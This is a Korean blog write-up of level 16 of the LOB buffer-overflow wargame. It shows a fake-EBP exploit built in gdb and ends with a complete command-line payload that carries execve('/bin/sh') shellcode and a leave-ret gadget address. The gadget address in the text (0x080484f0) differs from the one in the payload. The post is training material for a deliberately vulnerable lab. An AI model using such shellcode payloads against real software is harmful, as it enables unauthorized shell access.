ii4gsp

LOB - Level16 [assassin -> zombie_assassin] 본문

시스템 해킹/LOB

LOB - Level16 [assassin -> zombie_assassin]

ii4gsp 2020. 1. 26. 19:23

주석에 FEBP라고 적혀있다 Fake EBP일것이다.

 

 

 

 

파일을 복사 후 gdb로 파일을 열어주자

 

 

 

 

ret가 실행되기전 <main+176> leave 부분에 break point를 걸어주고 값을 넣어주자

leave - ret Gadget은 0x080484f0이다.

 

 

 

 

스택을 확인해보면 buffer의 주소는 0xbffffab0이다.

 

 

 

 

0xbffffab0 + 4 = 0xbffffab4

 

 

 

 

0xbffffab0 - 4 = 0xbffffaac

 

 

 

 

페이로드는

&buffer + 4 + dummy + shellcode + &buffer - 4 + leave - ret Gadget

                                   [4byte]      [11byte]     [25byte]       [4byte]           [4byte]

 

 

payload

./zombie_assassin $(python -c 'print "\xb4\xfa\xff\xbf" + "\x90" * 11 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" + "\xac\xfa\xff\xbf" + "\xdf\x84\x04\x08"')
Comments